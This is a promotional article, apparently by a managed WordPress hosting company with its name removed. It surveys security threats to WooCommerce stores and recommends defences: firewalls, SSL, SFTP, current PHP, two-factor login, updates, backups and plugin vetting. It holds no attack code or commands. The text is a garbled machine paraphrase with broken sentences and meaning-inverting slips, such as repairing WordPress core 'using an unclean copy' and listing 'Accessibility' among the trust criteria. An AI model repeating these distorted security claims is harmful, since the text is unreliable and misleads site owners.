E-commerce security The 9 most effective practices to create robust web sites

Nov 4, 2024
Security requirements and best practices for WooCommerce

-sidebar-toc>        -language-notice>

If you own a website, specifically an e-commerce website you are responsible to ensure that transactions take place in a secure manner and that the personal data of your customers and users are not stolen. Your WordPress website's database holds private information like physical and electronic addresses, credit card details as well as transaction logs and numerous other information, and you are responsible for the security and integrity of all this data.

The data controller is the one who decides the purposes for which as well as the method by which personal data is processed. If your organization or company decides on the reason and method by which your personal information should be processed, it is the data controller. The employees who process personal information in your company do this to fulfil your duties as data controller.

A security flaw in a website can put a company's security at risk. Who would want to entrust their credit card details on a site that's not secured? What harm could it cause for your reputation the data of your customers were stolen and used for illicit purposes?

13 significant security concerns for e-commerce websites

According to the 2020 Trustwave Global Security Report, traditional brick-and-mortar retailers and e-commerce environments are the most exposed businesses to cybersecurity threats which account for about 24% of total security incidents in 2019.

It is the reason we should look at the importance of security when it comes to e-commerce sites, find out the threats which could affect the online enterprise, as well as what measures e-commerce website administrators must adopt to protect their clients' transactions as well as information.

To better understand the actions and practices an online business owner needs to follow in order to safeguard their sites and online stores We must first be aware of the biggest security threats that e-commerce sites face.

On the basis of the Top 10 web Application Security Risks, we compiled this non-exhaustive checklist of the top threats that e-commerce websites have to face currently.

OWASP Top Ten for 2021 compared to 2017
OWASP Ten for 2021 (Source: OWASP). Ten in 2021 (Image source: OWASP)

1. Malware and Ransomware

Take a Look at Our Video Guide on Malware

2. Phishing

A diagram of a phishing attack
Diagram of a Phishing attack (Image from Cloudflare)

It is a means of trying to steal sensitive data such as usernames, passwords and credit card account numbers, and other crucial data that you can make use of or sell using malicious intent. The majority of the time, this type attack happens through spam and other forms of fraudulent emails, or immediate messages.

Google's phishing warning sign, showing
Google's phishing warning sign. (Image source: FixMyWP)

3. DDoS attacks

My dashboard analytics showing resource consumption
My dashboard's analytics show the consumption of resources.

4. SQL injection

Example of SQL injection
An illustration for SQL injection (Image source: Cloudflare)

5. Cross-site scripting

Cross-Site Scripting (XSS) is an attack in which someone attaches malicious code onto an internet site to run when the page loads. The attack is carried out on the computer's browser. It is typically designed to steal sensitive information.

Cross-site scripting attack
What happens when a cross-site scripting attack works (Image source: Cloudflare)

6. Man-in-the-middle attacks

A man-in-the-middle (MitM) (also known as the on-path attack is a type of cyberattack in which someone places in the middle of two computers (such as a web browser and a web server) aiming to grab information and/or impersonate one of the agents, with malicious intent.

7. Credential stuffing

Credential stuffing scheme
How credential stuffing works. (Image source: Cloudflare)

8. Zero-day exploits

How hackers carry out a zero day attack
What hackers do to use zero-day attacks to attack. (Source: Norton)

9. E-skimming

E-skimming or digital skimming is when you insert malicious software onto a store's website aiming to obtain payment information when you pay. This can also be referred to as Magecart attacks.

MageCart diagram
A diagram describing how an MageCart attack operates (Image source: Sucuri)

10. Attacks by Brute Force

The brute-force attack is a method of trial and error that is used to identify sensitive information such as login credentials, API keys, and SSH credentials. When a password is compromised, it could be used to open additional services when you utilize the same credentials across multiple websites. (See credential stuffing.)

11. Backdoors

Backdoors backdoor allows you to evade an authentication or encryption system to allow you to log in automatically on a site, device or service. Once a website or service has been breached an attacker may create their own backdoors to gain access to your site, steal data, and potentially destroy your entire site.

12. Social Engineering attacks

social engineering attacks can be particularly risky since they target the characteristics of human nature: trust in others and lack of understanding, discomfort in contravening an order, utilitarianism, and so on. Social engineering is the psychological manipulation of people in the pursuit of revealing private information, such as accounts, passwords, and financial information.

Take a look at our Video Guide To Understand the CSRF attacks.    

13. Supply Chain Invasions

Most often, in a supply chain attack an attacker from cyber infiltrates malicious code into a supplier's software, which is then distributed with an update.

9 best practices to secure your e-commerce website

Securing a website can be difficult if you're lacking the proper equipment and expertise, however it's not a job for dedicated engineers. Most important is to know vulnerable areas and educate both your employees and yourself on the best practices for securing your e-commerce website from the most common dangers.

The task you have to complete is two-fold: on the one hand, you are in charge of securing WordPress and WooCommerce, determine who can access the platform, the plugins to be installed, the payment gateway, the authentication system, and all things related to WordPress, plugin, and theme maintenance. However it is essential to have a safe and cutting-edge infrastructure. This is where the quality of your hosting provider will be crucial.

1. Choose a cutting-edge hosting infrastructure

The choice of the hosting infrastructure is vital to your site's security, branding reputation and ultimately, the growth of your enterprise. You have several types of hosting services available, and they differ considerably regarding the type of infrastructure they use as well as the service offered.

  • Shared hosting
  • Host dedicated
  • VPS hosting
  • Cloud hosting
  • Managed WordPress hosting

If you want to have control of your hosting, but do not have the best technical knowledge and/or resources then you can consider an Virtual Private Server (VPS) hosting. It is at the midpoint between dedicated and shared hosting. However, the VPS might have a few disadvantages: It may be unable to handle high traffic levels or fluctuations and is dependent on other sites that are hosted on the server.

    A cloud-based, managed WordPress hosting service combines benefits of both, combining the high-speed and secure infrastructure of cloud-based services and the convenience of using managed WordPress hosting services.    

hosting infrastructure and technical stack

Google Cloud regions
Google Cloud regions (Source: Google)

Additionally, we've built a fast and secure technical stack based on Nginx, MariaDB, PHP 8.3, LXD containers, and the integration of Cloudflare Enterprise, which provides an additional level of security that includes firewalls, DDoS security, as well as much more. This stack is available for every client regardless of the plans they have.

    We use Linux containers (LXC) and LXD to orchestrate them on top of the Google Cloud Platform (GCP) which ensures complete isolation of each individual WordPress website. The website you're using doesn't connect resources to any other site, not even other sites that are on your account.

A diagram of ’s WordPress Hosting infrastructure
Diagram of the WordPress Hosting infrastructure.

2. Use a web application firewall

The WAF is critical to your website, whether you're just starting out as a blogger or an experienced entrepreneur. When it comes to e-commerce sites, having an application firewall for your website is vital because an unprotected website is an easy catch for hackers and other malicious criminals.

In the absence of a web application firewall hackers can quickly take control of your site, change login credentials, steal or destroy information, damage it and carry out any sort of illicit activities. In the event, they could destroy your site completely. Furthermore, your website could be at risk of DDoS or assaults using brute force.

The websites that are hosted by Cloudflare are protected by Cloudflare

Cloudflare waf
How a web application firewall works (Image Source: Cloudflare)

3. Set up an SSL certificate

SSL certificates for

    Cloudflare SSL Certificates are offered without cost to every client, irrespective of the plan they choose to use.    

Check Out our Video How-to Guide on Choosing the Correct SSL Certificate to Protect Your Site    

4. Utilize secured SFTP as well as SSH connections

Setting SFTP protocol in Filezilla
Setting SFTP protocol in Filezilla

It only supports SFTP/SSH connections.

    Since SFTP is a more secure technique, it only works with SFTP connection.    

The details for SFTP/SSH are accessible on Your My Dashboard in the section WordPress Websitesunder Sitename> Environment> Info. Name of the site> Environment> Information.

SFTP environment credentials in My
SFTP account credentials to the environment within My

5. Make sure you are using supported versions of PHP

Each PHP version usually is maintained for 2 years. Only versions that are supported receive security and performance enhancements, so using unsupported PHP versions slows down performance, and also increases the likelihood of security vulnerabilities.

As of August 2024, PHP's official supported versions for PHP include PHP 8.1, 8.2, and 8.3.

Supported PHP versions
Versions of PHP supported PHP version (Source PHP.net)

    At the time of this posting, all PHP versions that are prior to 8.1 aren't receiving security updates. If you're using PHP 8.0 or earlier you are exposed to security flaws which won't be corrected.

Only allows compatible PHP versions

It may take additional development effort if you use specific plugins that aren't compatible with supported PHP versions. However, our main responsibility is to ensure maximum security for your websites as well as our whole infrastructure. For this reason, does not allow users to run versions that are not supported by the PHP versions.

users can modify the PHP version of their WordPress website through My. Go to the configuration section, then select Tools from the menu left. Go to the bottom of the page, and discover the PHP engine. Hit the Modify button and choose the PHP version that is appropriate for your site.

Modify PHP engine in My
Modify the PHP engine in My

6. Enable two-factor authentication

Using strong passwords to secure your website and hosting account might not be enough to safeguard your e-commerce website. Making use of a multi-factor authentication method is strongly recommended.

Multi-factor authentication is an authorization system where the user who is logging in to the service has to give two or more evidence of identity. This can be done by using different methods such as fingerprints authenticator app, an email, an SMS, a token that is a device or a hardware token, among others.

Enable 2FA with

Additionally, if you are having a secure password for My, we recommend enabling two-factor authentication. You should also ask all users in your company to do this. With 2FA enabled the login process for My will require an additional verification code from an authenticator app (e.g., Google Authenticator) using your mobile or a password management application.

To activate 2FA on My, click on your name at the top right corner and select Settings for users. In My account go down to the section two-factor authentication. Click on the toggle button, then scan the QR code in your authenticator app, enter the six-digit code that you can see within the app and then click the button to complete.

Two-factor authentication in My
Two-factor authentication in My

It is important to note that 2FA no longer works with SMS-based 2FA as it's at risk of phone-based attacks and has less security as a token based on time. A recent security breach by Authy revealed 33 million customer number numbers, which increased the danger of SMS fraud and SIM-swapping.

 no longer supports SMS authentication
is no longer supported SMS authentication with SMS

Set up 2FA in WordPress

It is also possible to enable two-factor authentication on your e-commerce website. WordPress is not able to allow 2FA in the default settings however, you are able to quickly and effortlessly add the feature to your website with any of the plugins listed below:

Additionally to WordPress core releases, WordPress releases security updates frequently whenever a new vulnerability is identified. Similar is the case with themes and plugins.

To keep your WordPress website protected, you need to keep your whole WordPress site up-to-date to prevent security vulnerabilities.

You can also manage automatic update for plugins and themes.

Enable/disable automatic plugin updates
Enable/disable automatic plugin updates
Enable/disable automatic plugin updates
Enable/disable automatic plugin updates

If you'd like that you do not disable this option and carry out the updates yourself, but the process of updating many websites can be an arduous and tedious process. Many agencies turn to third-party software that allows them to manage updates to every one of their WordPress sites from a single external environment.

Customers do not have to buy third-party services to manage the updates because they can take advantage of the ability to update in bulk in the My dashboard.

WordPress Updates with

Update plugins in bulk in My
Update plugins in bulk in My

When you perform an update using My The system creates a backup is created so you can revert the process for two hours in the event that the update is unsuccessful. This gives you a sense of security, and offers security whenever you have to upgrade your themes, plugins or plugins.

A system-generated backup is created when you bulk update your plugins
Backups generated by the system are created when you bulk update your plugins.

Additionally, you can run bulk updates for many WordPress websites at the same time. In your My dashboard go to the My dashboard and select WordPress sites. From there, choose any or all of the websites, and click on the actions button to the right and then choose the most important action you wish to perform. If you are changing plugins, just click the relevant menu option. A pop-up will display an inventory of the plugins for which an update is available.

Choose the plugins you want to update and wait just a couple of minutes. The pop-up window will notify you when it was done successfully.

If the update is unsuccessful In the event that it fails to update, visit the sitename > Backups > System-generated page under My and then restore the latest backup.

System-generated backups in My dashboard
Backups generated by the system are available in My Dashboard

    On , you'll be able to upgrade themes and plugins on all your WordPress websites easily on one page, at no cost. Perfect for agencies handling many sites from the same place.

8. Backups

A web hosting provider that truly cares about the e-commerce site it hosts should provide regular WordPress backups. provides six different kinds of backup.

The backup options are six in total offered by

We provide regular, automatic WordPress backups and the system generated backups for all WordPress websites. These backups, along with manual backups, are available as restore points within My. It is also possible to manually make an online backup every week.

Daily backups in My
Restoring a backup to a staging environment My
Hourly backups in My
You can anable six-hours and daily backups within My
External backups in My
It allows integration that can be integrated Amazon S3 and Google Cloud Storage

9. Be careful with plugins

You often need many plugins on your WordPress site. This is especially true when it comes to e-commerce. This usually require features not included in WordPress or WooCommerce in the initial version. We've got a huge list of plugins we recommend for you to browse and see for yourself:

You should not download the first one that pops up. You should follow a few best practices to follow when choosing the plugins you will use on your WooCommerce website:

Choose plugins that get regularly scheduled updates from vendors that have excellent reputations. Trust the community and check reviews and ratings from other users. Avoid, if possible, plugins that are not rated highly and maintained by unknown vendors.

Technical details of the WooCommerce plugin
Technical details of the WooCommerce plugin

Always test a plugin using a staging setting before putting it into the production. This prevents compatibility issues with other plugins or with the WordPress core.

    Always backup your site prior to installing the plugin on production.    

Don't install any unneeded plugins or plug-ins that offer useless functions. Unnecessary plugins could possibly cause unnecessary security vulnerabilities, conflict with other plugins, or reduce site performance.

Check if there are any known vulnerabilities to the plugin. Use security services such as the WordPress Vulnerability Database or WPScan.

So, how do web hosts assist with theme and plugin weaknesses?

security alerts

If a security flaw is discovered on one of your sites or plugins, regardless of whether it's a fundamental plugin, theme, or vulnerability, you will immediately be sent a notification in My and an email notifying you about the issue and offering suggestions for fixing the issue.

This function is adored by our clients because it allows them to take quick actions on security issues that are detected in their websites. If you are a client, sooner or later it is likely that you'll receive an email similar to this:

An email from  notifying a vulnerability in WooCommerce
A notification email sent to notify an issue with WooCommerce

WordPress-specific dangers and the best way to avoid them

In the initial section of this article, we have listed some of the major security threats that impact the overall security of eCommerce websites. Some of these threats are particularly serious for WordPress/WooCommerce sites.

Although WordPress is open-source software, it is worth pointing out that hackers don't attack WordPress websites due to inherent vulnerabilities in the CMS however, it is due to vulnerabilities that could have been predicted and rectified prior to an security incident.

Failure to update the core, plugins, and theme can make your e-commerce site vulnerable in the same method as using passwords that are weak and having no strict site access policy.

Here is a quick list of threats and strategies to stop them that can help you keep your website secure:

Additional features to enhance your website security

We aim to provide the fastest and secure WordPress hosting platform in the world. We're always seeking methods to improve the security of your e-commerce websites can offer customers the best possible shopping experience your users and clients. Here are some of 's services and features specifically aimed at securing your WordPress/WooCommerce website.

Uptime checks

If your website does not respond or is slow, how can ensure that the site is not down for all users or just you?

    scans your website every 3 minutes. It's 480 checks every day.

If your website is not functioning, our engineers start working immediately to address the issue. There is a very good possibility that the issue will be fixed before you even notice it.

Take a look at our Video Guide On How To Check If a Website is Down:

's security pledge

But sometimes, despite all the efforts you make, it could be the case that your site is damaged. What to do then?

customers do not have to be concerned about this since If the WordPress website is compromised when hosted by us  the site, we'll assist the site owner for no charge to investigate to repair the damage.

Our security pledge includes:

  • An inspection of the site as well as a thorough analysis of the site's file to find malware.
  • Repair of the WordPress core using an unclean copy of the core data files.
  • The removal and detection of the infected plugins and themes.

Blocking IP

Sometimes, it may be essential to block an IP or range of IPs to stop malicious actions from bots, spammers, or other actors. In general, it is possible to block IP addresses in your server's configuration files.

For checking IP addresses and the amount of requests made you need to log into My and go into WordPress Websites > Sitename > Analytics > Geo & IP.

Top client IPs.
Top IPs for clients.
Add IP addresses to the IP Deny tool in My.
Add IP addresses to the IP Deny tool in My.

Once you have blocked any IP addresses, you will find it listed on the identical page.

Add an IP address to deny in My.
Include an IP address in deny in My.

Security certifications

The commitment to ensure the security of the websites of clients is verified and certified at various levels.

The five trust services criteria include:

  • Security
  • Accessibility
  • Integrity of processing
  • Confidentiality
  • Privacy

They provide assurance of security and stability for any owner of an online store who are able to rely on a hosting service which allows them to dedicate their time to business in peace.

ISO/IEC 27001 is the world's most widely-known standard for information security management systems. An ISMS implemented according to the standard "is an instrument for risk management, cyber-resilience, and operational efficiency."

Conformity with ISO/IEC 27001 means that an enterprise or company has implemented the necessary system for managing risk that are related to security of data owned or processed by the business, and that this system respects all of the highest standards and principles enshrined in this International Standard.

ISO/IEC 27017:2015 defines guidelines for security of information that can be applied for the supply and use of cloud-based services. It provides

  • further implementation guidance on the appropriate controls as specified in ISO/IEC 27002;
  • Additional controls and implementation guidelines that specifically relate to cloud services.

Final, ISO 27018:2019

Establishes common-sense control goals that establishes guidelines, control, and objectives that are used to implement measures to secure Personally Identifiable Information (PII) in line with the principles for privacy set out that are outlined in ISO/IEC29100 for the public cloud computing environment.

You can visit 's Trust Center to find more information on the company's continuous compliance initiatives.

Summary

There is a lot to do to create the e-commerce site. Making it your own requires a lot of technical expertise that might not be accessible to smaller companies and new start-ups.

But a business owner who wants to launch an online store and accept the challenges that come with international markets, should not let go of the opportunities for growth which e-commerce offers. That's why enterprise-level managed WordPress as well as WooCommerce Hosting will aid.

Through these security measures, locks your website's e-commerce site, while reducing the risk of data breaches as well as downtime.

This is your chance to shine. What are the dangers and vulnerabilities that you have to deal with each day? Do you have a hosting provider that provides the e-commerce website with sufficient protection from malicious actors? Share your experience in the comments below.

Carlo Daniele

Carlo is a passionate fan of front-end and web design development. He's been playing around with WordPress for over twenty years. He also works in collaboration with Italian as well as European universities and educational institutions. He has written a number of articles and guides about WordPress, published both on Italian and foreign websites as well as in print magazines. He is on LinkedIn.